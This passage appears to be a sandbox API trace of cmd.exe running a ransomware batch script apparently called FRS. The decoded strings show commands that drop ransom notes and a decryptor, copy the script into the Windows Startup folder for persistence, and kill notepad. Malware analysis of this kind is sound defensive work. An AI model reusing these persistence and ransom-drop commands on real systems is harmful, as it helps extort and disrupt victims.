lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0107.146] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0107.146] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.146] GetFileType (hFile=0x24c) returned 0x1 [0107.146] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0107.146] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.146] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0107.147] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0107.147] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.147] GetFileType (hFile=0x24c) returned 0x1 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0107.147] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0107.147] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0107.147] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.147] GetFileType (hFile=0x24c) returned 0x1 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0107.147] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0107.147] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0107.147] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.147] GetFileType (hFile=0x24c) returned 0x1 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0107.147] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0107.147] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0107.147] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.147] GetFileType (hFile=0x24c) returned 0x1 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0107.147] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0107.147] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0107.147] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0107.148] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.148] GetFileType (hFile=0x24c) returned 0x1 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0107.148] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0107.148] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0107.148] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.148] GetFileType (hFile=0x24c) returned 0x1 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0107.148] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0107.148] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0107.148] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.148] GetFileType (hFile=0x24c) returned 0x1 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0107.148] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0107.148] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0107.148] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.148] GetFileType (hFile=0x24c) returned 0x1 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0107.148] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.148] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0107.148] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0107.149] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.149] GetFileType (hFile=0x24c) returned 0x1 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0107.149] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0107.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0107.149] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.149] GetFileType (hFile=0x24c) returned 0x1 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0107.149] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0107.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0107.149] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.149] GetFileType (hFile=0x24c) returned 0x1 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0107.149] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0107.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0107.149] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.149] GetFileType (hFile=0x24c) returned 0x1 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0107.149] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0107.149] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0107.149] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0107.150] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.150] GetFileType (hFile=0x24c) returned 0x1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0107.150] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0107.150] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0107.150] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.150] GetFileType (hFile=0x24c) returned 0x1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0107.150] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0107.150] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0107.150] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.150] GetFileType (hFile=0x24c) returned 0x1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0107.150] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0107.150] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0107.150] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.150] GetFileType (hFile=0x24c) returned 0x1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0107.150] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0107.150] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0107.150] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.150] GetFileType (hFile=0x24c) returned 0x1 [0107.150] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0107.151] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0107.151] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0107.151] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.151] GetFileType (hFile=0x24c) returned 0x1 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0107.151] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0107.151] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0107.151] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.151] GetFileType (hFile=0x24c) returned 0x1 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0107.151] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0107.151] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0107.151] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.151] GetFileType (hFile=0x24c) returned 0x1 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0107.151] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0107.151] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0107.151] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0107.152] _get_osfhandle (_FileHandle=1) returned 0x28 [0107.152] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0107.152] _get_osfhandle (_FileHandle=0) returned 0x24 [0107.152] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0107.152] SetConsoleInputExeNameW () returned 0x1 [0107.152] GetConsoleOutputCP () returned 0x1b5 [0107.152] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0107.152] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.152] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0107.152] _open_osfhandle (_OSFileHandle=0x24c, _Flags=8) returned 3 [0107.152] _get_osfhandle (_FileHandle=3) returned 0x24c [0107.152] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0107.152] SetFilePointer (in: hFile=0x24c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0107.152] ReadFile (in: hFile=0x24c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointer (in: hFile=0x24c, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0107.153] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 